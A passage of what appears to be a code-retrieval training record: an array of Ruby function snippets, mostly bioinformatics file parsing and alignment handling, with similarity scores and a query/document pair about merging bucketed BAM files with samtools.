"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def getFileReports(array)\n\t\t\thashes = array\n\t\t\t# Get multiple file reports\n\t\t\ti = 0\n\t\t\thashes = hashes.uniq\n\t\t\twhile i < hashes.size\n\t\t\t\t4.times do\n\t\t\t\t\tif hashes == nil\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse\n\t\t\t\t\t\tputs \"[*] Fetching file report for #{hashes[i].slice(0)} (#{i+1}/#{hashes.size})\"\n\t\t\t\t\t\thashes[i] << VirusTotal.new.get_file_report(hashes[i].slice(0))\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\ti += 1\n\t\t\tend\n\t\t\tif i >= (hashes.size - 4)\n\t\t\t\tputs \"[*] Skipping 4.times loop, i am all done..\"\n\t\t\t\treturn hashes\n\t\t\telse\n\t\t\t\tputs \"[*] Sleeping 65 seconds.\"\n\t\t\t\tsleep(65)\n\t\t\tend\n\t\tend",
"def read_multi(*names); end",
"def split_by_size(chunk, size)\n chunk.each_slice(size).to_a\n end",
"def read_dta_files(fh, num_files, unpack_35)\n dta_files = Array.new(num_files)\n start = dta_start_byte\n fh.pos = start\n\n header.num_dta_files.times do |i|\n dta_files[i] = Mspire::Sequest::Srf::Dta.from_io(fh, unpack_35) \n end\n dta_files\n end",
"def readFormants(file)\n f1, f2 = [], []\n\n fs = []\n\n File.open(file, \"r\") do |f|\n # 9 useless lines\n 9.times { f.gets }\n while !f.eof?\n #Each block starts with the number of formants found\n f.gets\n how_many = f.gets.to_i\n #We are only interested in the first two formants\n f1 = f.gets.to_f\n f.gets\n f2 = f.gets.to_f\n (1+(how_many-2)*2).times { f.gets}\n fs << [f1,f2]\n end\n end\n\n fs\nend",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def read(start: 0, num: 10)\n f = open(@filename, 'r')\n # Iterate to start line\n start.times { f.gets }\n \n # Read lines start to last\n data = ''\n num.times {\n chunk = f.gets\n data << chunk unless chunk.nil?\n }\n \n f.close()\n return data\n end",
"def q1_read_to_array(data_file_name)\r\n array2d = []\r\n \r\n read_file(\"data/\"+data_file_name).each{ |line|\r\n array1d = line.split(\",\").map(&:strip).map(&:to_s)\r\n array2d << array1d\r\n }\r\n return array2d\r\nend",
"def read_blocks(start_block, block_count, nonce)\n data = @disk.read_blocks start_block + @data_start, block_count\n hmacs = (0...block_count).map do |i|\n load_data = @tree_driver.load_leaf start_block + i\n load_data[:ops] <<\n { :op => :sign, :line => load_data[:line], :session_id => @sid,\n :nonce => nonce, :data => data[i * block_size, block_size],\n :block => start_block + i }\n add_tree_data_to_ops load_data[:ops]\n response = @fpga.perform_ops load_data[:ops]\n @tree_driver.perform_ops load_data[:ops]\n response.first\n end\n { :data => data, :hmacs => hmacs }\n end",
"def add_result_raw_reads(base, _opts)\n return nil unless result_files_exist?(base, '.1.fastq')\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name,\n ( result_files_exist?(base, '.2.fastq') ?\n {pair1: '.1.fastq', pair2: '.2.fastq'} :\n {single: '.1.fastq'} ))\n end",
"def records_array(lines)\n lines.map { |line| collect_line(line) }.select { |rate| rate[:rate_type] == :list }\n end",
"def mm_selreads(cigarstring, selread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif selread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def parse_barcode_seq_stats(stats_filename)\n @barcodes.each {|bcinfo| bcinfo[:seq_stats] = Hash.new}\n STDERR.puts \"Reading barcode stats file #{stats_filename}\" if @verbose\n parse_barcode_stats_file(stats_filename)\n @barcodes.each do |bcinfo|\n bcinfo[:seq_stats][\"Total Reads\"] =\n bcinfo[:seq_stats][\"Post-Filter Reads\"].to_i +\n bcinfo[:seq_stats][\"Failed Reads\"].to_i\n end\n end",
"def read_file\n match_file = File.new(\"matches.txt\", \"r\")\n no_of_match = match_file.gets\n if no_of_match != nil\n for i in 0..no_of_match.to_i - 1\n match_result = match_file.gets\n @matchesarr << match_result\n end\n end\n match_file.close\n end",
"def readFiles\n rError = nil\n\n if (File.exists?(@TasksFileName))\n @LstTasks = nil\n File.open(@TasksFileName, 'r') do |iFile|\n @LstTasks = iFile.readlines.map do |iLine|\n next iLine.strip\n end\n end\n if (File.exists?(@TicketsFileName))\n @LstTickets = nil\n File.open(@TicketsFileName, 'r') do |iFile|\n @LstTickets = iFile.readlines.map do |iLine|\n next iLine.strip\n end\n end\n else\n rError = MissingTicketsFileError.new(\"Missing Tickets file: #{@TicketsFileName}\")\n end\n else\n rError = MissingTasksFileError.new(\"Missing Tasks file: #{@TasksFileName}\")\n end\n\n return rError\n end",
"def lines\n total = 0\n chunk { |measurement|\n total += measurement.length + DELIMITER.length * 2\n total / max\n }.map { |_, line|\n [source, line].join(DELIMITER)\n }\n end",
"def split(max_size = 100000, overlap = 0)\n \tsub_slices = Array.new\n i = 0\n \tself.start.step(self.length, max_size - overlap - 1) do |i|\n sub_slices.push(self.sub_slice(i, i + max_size - 1))\n end\n \ti -= (overlap + 1)\n sub_slices.push(self.sub_slice(i + max_size))\n \treturn sub_slices\n end",
"def classify(reads, within, support_reads, support_clip_length)\n read_groups = grouping_reads(reads, within, support_reads, support_reads)\n clips = [] # without SID reads\n non_clips = []\n\n read_groups.each do |read_group|\n if read_group.all? { |read| read.type == :B || read.type == :F }\n clips << read_group.sort\n else\n non_clips << read_group.sort\n end\n end\n non_clips.uniq!\n return clips, non_clips\n end",
"def read_uint_array_by_size(size, count)\n count.times.map { read_uint_by_size(size) }\n end",
"def batches(batch_size:, cursor:)\n @csv.lazy\n .each_slice(batch_size)\n .with_index\n .drop(count_of_processed_rows(cursor))\n .to_enum { (count_of_rows_in_file.to_f / batch_size).ceil }\n end",
"def chunks(chunk_size = DEFAULT_CHUNK_SIZE)\n raise 'Block required' unless block_given?\n\n raw = source_file.read\n\n range_end = lambda do |max|\n val = max > raw.length ? raw.length : max\n val - 1\n end\n\n range = 0..range_end.call(chunk_size)\n\n loop do\n yield raw[range]\n break if range.last + 1 == raw.length\n first = range.last + 1\n last = range_end.call(range.last + chunk_size)\n range = first..last\n end\n end",
"def calculate_total_seqs\n file_summaries.sum(&:seqs)\n end",
"def find_files(levels=[\"0\"],up_to=300)\n\tarr = []\n\tnames = []\n\t(0...up_to).each do |i|\n\t\tlevels.each do |j|\n\t\t\tif (File.exists?(\"../scraper_and_data/scraped_genomes/level_\" + j + \"/\"+i.to_s))\n\t\t\t\tarr << \"../scraper_and_data/scraped_genomes/level_\" + j + \"/\"+i.to_s\n\t\t\t\tnames << i.to_s\n\t\t\tend\n\t\tend\n\tend\n\treturn arr,names\nend",
"def sc_recorders(file_base, interval, limit)\n recs = []\n\n # Real power loss recorders\n loss_types = {\n 'overhead_line' => 'OHL',\n 'underground_line' => 'UGL',\n 'triplex_line' => 'TPL',\n 'transformer' => 'TFR'\n }\n loss_types.each do |ltype, abbrev|\n # Only set up recorders for classes that actually exist in the feeder\n # (Specifically, R3_1247_2 doesn't have any triplex_lines,\n # and trying to record on class=triplex_line crashes GridLAB-D)\n if @lines.detect {|line| line.is_a?(GLMObject) && line[:class] == ltype}\n recs << new_obj({\n class: 'collector',\n group: \"\\\"class=#{ltype}\\\"\",\n property: 'sum(power_losses.real),sum(power_losses.imag)',\n interval: interval,\n limit: limit,\n file: file_base + abbrev + '_losses.csv'\n })\n end\n end\n\n # Aging_Transformer loss of life and replacements\n # All we really care about is these values at the end of the run,\n # so we'll only collect them once a day to save space\n xfmr_props = {\n 'percent_loss_of_life' => 'pct_lol',\n 'transformer_replacement_count' => 'replacements'\n }\n xfmr_props.each do |prop, abbrev|\n recs << new_obj({\n class: 'group_recorder',\n group: \"\\\"groupid=#{AGING_GROUPID}\\\"\",\n property: prop,\n interval: DAY_INTERVAL,\n limit: limit,\n file: file_base + 'xfmr_' + abbrev + '.csv'\n })\n end\n\n # Also collect power profiles for Aging_Transformers so we\n # can have some sense of why we're seeing what we're seeing\n recs << new_obj({\n class: 'group_recorder',\n group: \"\\\"groupid=#{AGING_GROUPID}\\\"\",\n property: 'power_in',\n complex_part: 'MAG',\n interval: interval,\n limit: limit,\n file: file_base + 'xfmr_va.csv'\n })\n\n # Tap-change recorders\n find_by_class('regulator').each do |reg|\n recs << new_obj({\n class: 'recorder',\n parent: reg[:name],\n property: 'tap_A_change_count,tap_B_change_count,tap_C_change_count,tap_A,tap_B,tap_C,power_in_A.real,power_in_A.imag,power_in_B.real,power_in_B.imag,power_in_C.real,power_in_C.imag,power_out_A.real,power_out_A.imag,power_out_B.real,power_out_B.imag,power_out_C.real,power_out_C.imag,current_in_A.real,current_in_A.imag,current_in_B.real,current_in_B.imag,current_in_C.real,current_in_C.imag,current_out_A.real,current_out_A.imag,current_out_B.real,current_out_B.imag,current_out_C.real,current_out_C.imag',\n interval: interval,\n limit: limit,\n file: file_base + reg[:name][-5..-1] + '.csv'\n })\n end\n\n # Record voltage at the point of use, which conveniently is always\n # a triplex_meter\n recs << new_obj({\n class: 'group_recorder',\n group: 'class=triplex_meter',\n property: \"voltage_12\",\n complex_part: 'MAG',\n interval: interval,\n limit: limit,\n file: file_base + 'v_profile_12.csv'\n })\n\n # Record total PV output, if there is any SC solar to record\n if find_by_class('house').any? {|h| h.nested.any? 
{|n| n[:groupid] == SC_GROUPID }}\n recs << new_obj({\n class: 'collector',\n group: \"\\\"class=ZIPload AND groupid=#{SC_GROUPID}\\\"\",\n property: 'sum(actual_power.real)',\n interval: MINUTE_INTERVAL,\n limit: limit,\n file: file_base + 'sc_gen.csv'\n })\n end\n\n # Record aggregate SC storage stats, if there's any storage\n unless find_by_four_quadrant_control_mode(SC_CONTROL_MODE).empty?\n recs << new_obj({\n class: 'collector',\n group: \"\\\"class=inverter\\\"\",\n property: 'sum(sc_dispatch_power),avg(battery_soc),std(battery_soc),min(battery_soc),max(battery_soc)',\n interval: MINUTE_INTERVAL,\n limit: limit,\n file: file_base + 'sc_storage.csv'\n })\n end\n\n # Record capacitor switch states, if any\n caps = find_by_class('capacitor')\n unless caps.empty?\n\n prop = caps.map do |cap|\n PHASES.map do |ph|\n \"#{cap[:name]}:switch#{ph}\"\n end\n end.flatten.join ','\n\n recs << new_obj({\n class: 'multi_recorder',\n property: prop,\n interval: interval,\n limit: limit,\n file: file_base + 'cap_switch.csv'\n })\n end\n\n recs\n end",
"def readProblem()\n # If not provided on command line, prompt user for input file:\n if ARGV[0] == nil\n printf \"Data file? \"\n fname = gets.chomp!\n else\n fname = ARGV[0]\n end\n infile = open(fname)\n\n # Read it all in, first n...\n n = infile.gets.to_i\n\n # ... then the values and weights...\n val = Array.new(n)\n wt = Array.new(n)\n for i in 0..n-1\n dummy,val[i],wt[i] = infile.gets.split.map {|x| x.to_i}\n end\n\n # ... and finally the capacity:\n cap = infile.gets.to_i\n \n return n,val,wt,cap\nend",
"def create_arrays(file)\n file.each do |line|\n new_string = line.split\n if new_string.last.is_number?\n # array_location removes the number character and converts it to an\n # integer\n # this variable will then be subtracted by 1 to determine the correct\n # index number later\n array_location = new_string.pop.to_i\n new_string.reverse!\n if (array_location) <= new_string.length\n puts new_string[array_location - 1]\n end\n end\n end\nend"
] |
[
"0.52647674",
"0.51238215",
"0.49227256",
"0.4905906",
"0.4859709",
"0.48278394",
"0.47935632",
"0.47273198",
"0.47244495",
"0.4696616",
"0.4696616",
"0.4687543",
"0.4668299",
"0.46392527",
"0.4590947",
"0.4578109",
"0.45562068",
"0.4546629",
"0.4539287",
"0.4511761",
"0.44992033",
"0.4497493",
"0.44898167",
"0.44776285",
"0.44762027",
"0.44538254",
"0.4444865",
"0.44447693",
"0.44413915",
"0.44401538",
"0.4435788",
"0.4433891",
"0.44264475",
"0.44258192",
"0.4419563",
"0.43955755",
"0.43878776",
"0.43850994",
"0.4381949",
"0.43818793",
"0.4374901",
"0.43735185",
"0.43713814",
"0.43704474",
"0.43563038",
"0.43421075",
"0.4337949",
"0.43378738",
"0.43329698",
"0.43323535",
"0.432866",
"0.43273166",
"0.43227476",
"0.43227476",
"0.43215942",
"0.43194616",
"0.4316244",
"0.43140277",
"0.43113118",
"0.4284396",
"0.42793927",
"0.42718714",
"0.4252847",
"0.42484555",
"0.42348585",
"0.42321947",
"0.42318824",
"0.423179",
"0.42267004",
"0.4221933",
"0.42130822",
"0.42021203",
"0.41961575",
"0.41953978",
"0.4195095",
"0.4191635",
"0.41906488",
"0.41902328",
"0.41881064",
"0.41861218",
"0.41857737",
"0.41851783",
"0.4184907",
"0.4184523",
"0.41844305",
"0.4182424",
"0.41754994",
"0.41746897",
"0.41729078",
"0.41650906",
"0.41631287",
"0.41631103",
"0.41629776",
"0.41615745",
"0.41615433",
"0.41614673",
"0.4154142",
"0.41527405",
"0.41504645",
"0.4150092"
] |
0.55839044
|
0
|
Merges bucketed alignments into single bam file. infiles: array of filenames. outfile: merged file.
|
def unbucketize(infiles, outfile)
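  # samtools merge expects coordinate-sorted BAM inputs; -f overwrites outfile if it already exists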
run_cmd("samtools merge -f #{outfile} #{infiles.join(' ')}")
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def merge_files(files)\n files.reduce(nil) do |merged, file|\n puts \"Merging #{file}\" if @verbose\n merge(merged, file)\n end\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def merge\n @filenames.each do |f_name|\n reader = Fileread_with_row_index.new(f_name)\n last_row = reader.count_row - 1\n for i in 0..last_row \n line = reader.read_row(i)\n @writer.puts(line)\n end\n end\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def parse_bam_to_intermediate_files(out_prefix)\n script=File.join(File.dirname(__FILE__),\"bam_to_insert_size_bed.awk\")\n cmd = @conf.cluster_cmd_prefix(free:1, max:12, sync:true, name:\"bed_prep_#{File.basename(@bam.path)}\") +\n %W(/bin/bash -o pipefail -o errexit -c)\n filt = \"samtools view #{@bam.path} | awk -f #{script} -vbase=#{out_prefix} -vendness=\"\n if @bam.paired?\n filt += \"pe\"\n else\n filt += \"se -vsize=#{@bam.fragment_size}\"\n end\n cmd << \"\\\"#{filt}\\\"\"\n puts cmd.join(\" \") if @conf.verbose\n unless system(*cmd)\n @errors << \"Failure prepping bedfiles for #{@bam} #{$?.exitstatus}\"\n return false\n end\n if @bam.paired?\n IO.foreach(out_prefix+FRAGMENT_SIZE_SUFFIX) do |line|\n @bam.fragment_size = line.chomp.to_i\n break\n end\n end\n IO.foreach(out_prefix+\"_num_alignments.txt\") do |line|\n @bam.num_alignments = line.chomp.to_i\n break\n end\n return true\n end",
"def merge(*files)\n files.each do |f|\n f = check_for_file(f)\n @merged << f\n end\n end",
"def place_files_in_buckets\n @files.each do |file|\n place_file_in_buckets(file)\n end\n end",
"def merge_data(input_files)\n for filename in input_files\n merge_into_hash(filename)\n end\n sanitize_hash\n end",
"def merge(file, *times)\n\tparts = []\n\tsplit! file, *times do |out|\n\t\tparts << out \n\tend\n\tparts = parts.join ' + '\n\tout = merge_name(file, *times)\n\tsystem \"mkvmerge -o #{out} #{parts}\"\nend",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def process_workspace_bucket_files(files)\n # first mark any files that we already know are study files that haven't changed (can tell by generation tag)\n files_to_remove = []\n files.each do |file|\n # first, check if file is in a submission directory, and if so mark it for removal from list of files to sync\n if @submission_ids.include?(file.name.split('/').first) || file.name.end_with?('/')\n files_to_remove << file.generation\n else\n directory_name = DirectoryListing.get_folder_name(file.name)\n found_file = {'name' => file.name, 'size' => file.size, 'generation' => file.generation}\n # don't add directories to files_by_dir\n unless file.name.end_with?('/')\n # add to list of discovered files\n @files_by_dir[directory_name] ||= []\n @files_by_dir[directory_name] << found_file\n end\n found_study_file = @study_files.detect {|f| f.generation.to_i == file.generation }\n if found_study_file\n @synced_study_files << found_study_file\n files_to_remove << file.generation\n end\n end\n end\n\n # remove files from list to process\n files.delete_if {|f| files_to_remove.include?(f.generation)}\n\n # next update map of existing files to determine what can be grouped together in a directory listing\n @file_extension_map = DirectoryListing.create_extension_map(files, @file_extension_map)\n\n files.each do |file|\n # check first if file type is in file map in a group larger than 10 (or 20 for text files)\n file_extension = DirectoryListing.file_extension(file.name)\n directory_name = DirectoryListing.get_folder_name(file.name)\n max_size = file_extension == 'txt' ? 20 : 10\n if @file_extension_map.has_key?(directory_name) && !@file_extension_map[directory_name][file_extension].nil? && @file_extension_map[directory_name][file_extension] >= max_size\n process_directory_listing_file(file, file_extension)\n else\n # we are now dealing with singleton files or fastqs, so process accordingly (making sure to ignore directories)\n if DirectoryListing::PRIMARY_DATA_TYPES.any? {|ext| file_extension.include?(ext)} && !file.name.end_with?('/')\n # process fastq file into appropriate directory listing\n process_directory_listing_file(file, 'fastq')\n else\n # make sure file is not actually a folder by checking its size\n if file.size > 0\n # create a new entry\n unsynced_file = StudyFile.new(study_id: @study.id, name: file.name, upload_file_name: file.name, upload_content_type: file.content_type, upload_file_size: file.size, generation: file.generation, remote_location: file.name)\n @unsynced_files << unsynced_file\n end\n end\n end\n end\n end",
"def cat_files file_groups\n file_groups.each do |group|\n check_exists(group[:paths])\n # this is the Illumina recommended approach to combining these fastq files.\n # See the Casava 1.8 Users Guide for proof\n files_list = group[:paths].join(\" \")\n command = \"cat #{files_list} > #{group[:path]}\"\n execute command\n end\n end",
"def all_files_aligned?\n return false unless files.count > 1 # have to be at least 2 files to be aligned\n # for every fa file there is a corresponding afa file\n # means that chopping off the extensions there will be 2 of every file\n #\n # basename('') chops off both the prefix and the suffix provided so\n # /path/to/foo.fa => foo\n (absolute_path.glob('*.fa').map {|f| f.basename('.fa')} - absolute_path.glob('*.afa').map {|f| f.basename('.afa')}).empty?\n end",
"def combine_acs_files\n @files_by_datetime = {}\n @acs_dirs.each { |dir_name, acs_dir| acs_dir.combine_files!(@files_by_datetime) }\n end",
"def merge_reads\n @reads_fpath = output_fpath(\"quanto.reads.tsv\")\n if !output_exist?(@reads_fpath)\n File.open(@reads_fpath, 'w') do |file|\n file.puts(reads_header.join(\"\\t\"))\n @objects.each do |obj|\n file.puts(open(obj[:summary_path]).read.chomp)\n end\n end\n end\n end",
"def combine_files!(infiles)\n make_files_by_datetime\n infiles.merge!(@files_by_datetime) do |key, oldval, newval|\n log_error(\"Key collision: #{key}, #{oldval}, #{newval}\")\n raise\n end\n end",
"def merge_pairwise(aligns)\n ps = aligns.map do |align| \n seqs = []\n align.each do |bioseq|\n seqs << bioseq.to_s\n end\n seqs\n end\n template = []\n #m,x,n\n x = 2\n ftemp = ps.first.first\n nmax = ps.map {|pair| pair.first.size }.max\n mmax = ps.size\n mar = (0...mmax).to_a\n others = mar.map { [] }\n ns = mar.map { 0 }\n tn = 0\n on = 0\n (0...nmax).each do |n|\n (t_dsh, t_no_dsh) = mar.partition do |m| \n # this is RUBY 1.8 ONLY!!\n ps[m][0][ns[m]] == 45 # '-' is ascii 45\n end\n\n # if a template has a dash, all other off-templates need a dash\n if t_dsh.size > 0\n template[tn] = 45\n t_no_dsh.each do |m|\n # don't update these guys counter\n others[m][tn] = 45\n end\n t_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n ns[m] += 1\n end\n else # no dashes in the template\n t_no_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n end\n template[tn] = ps[0][0][ns[0]]\n ns.map!{|v| v+1 } \n end\n tn += 1\n end\n [cs_to_s(template), others.map! {|ar| cs_to_s(ar) } ]\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def merge\n @mergeit.merge_data(@input_files)\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] 